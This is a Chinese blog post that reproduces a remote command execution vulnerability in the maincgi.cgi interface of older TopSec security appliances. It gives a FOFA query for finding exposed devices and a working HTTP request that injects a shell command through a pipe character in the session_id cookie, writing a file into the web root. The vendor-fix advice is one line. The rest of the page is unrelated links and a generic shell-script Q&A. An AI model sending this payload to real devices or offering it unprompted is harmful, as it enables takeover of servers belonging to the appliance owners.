【漏洞复现】某厂商TopSec maincgi.cgi远程命令执行漏洞

最新推荐文章于 2024-06-15 18:16:46 发布
最新推荐文章于 2024-06-15 18:16:46 发布
阅读量524 收藏 8
点赞数 13
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136386033
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。

Nx02 漏洞描述

        天融信TOPSEC老版本maincgi接口存在RCE漏洞,攻击者利用此漏洞可以获取服务器权限。

Nx03 产品主页

fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

Nx04 漏洞复现

POC:

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Cookie: session_id_443=1|echo 'pmcujhgacrqzrvm' >> /www/htdocs/site/image/cltkfd.txt;
Accept-Encoding: gzip

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

解决方案-天融信防火墙mgmt-新手漏洞教程
2401_84915584的博客
07-01 239
提供天融信防火墙配置指南文档免费下载,摘要:天融信防火墙配置指南一、对象与规则现在大多防火墙都采用了面向对象的设计。针对对象的行为进行的快速识别处理,就是规则。
漏洞复现--天融信TOPSEC两处远程命令执行
wintercc1219的博客
02-04 475
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
天融信TOPSEC安全管理系统存在远程命令执行漏洞
最新发布
heike_Ch的博客
06-15 896
天融信TopSec安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
天融信TOPSEC Cookie 远程命令执行漏洞
m0_71285176的博客
01-10 539
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。命令:nuclei.exe -t 选择脚本 -u 扫描地址。
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 638
漏洞复现-天融信TOPSEC static_convert 远程命令执行漏洞,附带自己写的poc脚本
专题资料(2021-2022年)ftp各队登陆账号密码.docx
10-07
FTP(File Transfer Protocol)是一种用于在网络上进行文件传输的标准协议,它允许用户从远程服务器上传或下载文件。在标题提到的"专题资料(2021-2022年)ftp各队登陆账号密码.docx"文档中,列举了不同团队的FTP...
TOPSEC防火墙安装手册.pdf
11-04
TOPSEC防火墙安装手册.pdf
topsec技术白皮书.
02-09
topsec技术白皮书,包括NGFWARES,防火墙NGFW4000-UF,入侵检测IDS
天融信网络数据防泄漏系统(TopDLP-N)技术白皮书v4.1.doc
12-31
随着企业信息化的发展,信息系统越来越多的使用于日常工作中,成为不可或缺的工具和手段。通过企业信息化大大提高了企业生产效率,从 ERP 到SOA,成熟的企业已经越来越依赖于信息系统而运行发展并壮大;虚拟化、云计算等技术的发展更是为许多跨地区、跨国家的企业节约了大笔的专线费用,并且提供了信息传送的实时性、可靠性、保密性的保证。
topsec手册
08-09
天融信TOPSEC安全产品手册》是一份详尽阐述天融信安全产品配置与操作界面的指导性文档。这份手册对于理解并有效利用天融信网络安全解决方案至关重要,尤其对于系统管理员、网络安全专业人员以及对天融信产品感...
Topsec全系列产品介绍
12-13
Topsec全系列产品介绍.................................
【转载】漏洞复现--天融信TOPSEC两处远程命令执行
maoxiaotao的博客
02-04 96
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
天融信TOPSEC Cookie 远程命令执行漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1019
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
漏洞复现天融信TOPSEC-static-convert-远程命令执行
知黑而守白
01-04 192
攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 656
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞,附带自己写的poc脚本
编写一个shell脚本,内容如下,有任意一条命令步骤出现错误,则抛出报错: 以topsec用户执行 dpkg -i *.deb mkdir /usr/local/bin/test
08-22
### 回答1: #!/bin/bash if [ $(id -u) -ne 0 ]; then echo "错误:必须以root用户执行此脚本" exit 1 fi if ! dpkg -i *.deb; then echo "错误:安装deb包失败" exit 1 fi if ! mkdir /usr/local/bin/test; then echo "错误:创建目录失败" exit 1 fi ### 回答2: 编写一个shell脚本,内容如下: ```shell #!/bin/bash set -e # 切换到topsec用户 su - topsec -c "dpkg -i *.deb" # 创建目录 mkdir /usr/local/bin/test ``` 以上脚本的关键是使用 `set -e` 命令。它的作用是指示在脚本中如果任意一条命令步骤出现错误,就立即停止执行并抛出报错。 首先,通过 `su - topsec -c "dpkg -i *.deb"` 命令topsec用户身份执行 `dpkg -i *.deb`。如果dpkg命令执行出错,则会停止脚本的执行并抛出报错。 然后,使用 `mkdir /usr/local/bin/test` 创建目录。如果mkdir命令执行出错,则同样会停止脚本的执行并抛出报错。 通过使用 `set -e` 命令,我们可以确保如果其中一条命令出错,整个脚本都会停止执行,避免出现错误结果。 ### 回答3: 编写一个shell脚本如下: ```shell #!/bin/bash # 以topsec用户执行 dpkg -i *.deb 命令 su -c "dpkg -i *.deb" topsec if [ $? -ne 0 ]; then echo "dpkg 安装出错" exit 1 fi # 创建目录 /usr/local/bin/test mkdir /usr/local/bin/test if [ $? -ne 0 ]; then echo "创建目录出错" exit 1 fi echo "脚本执行完毕" ``` 脚本第一行指定使用bash来解释脚本内容。然后以topsec用户执行`dpkg -i *.deb`命令,通过`su -c`实现切换用户执行。然后通过`$?`判断上一条命令执行结果,如果不为0,则表示出现错误,输出错误信息并退出脚本。接下来使用`mkdir`命令创建`/usr/local/bin/test`目录,并通过`$?`判断命令执行结果。最后输出脚本执行完毕的信息。 需要注意的是,脚本执行需要具有足够的权限才能操作相关目录和文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值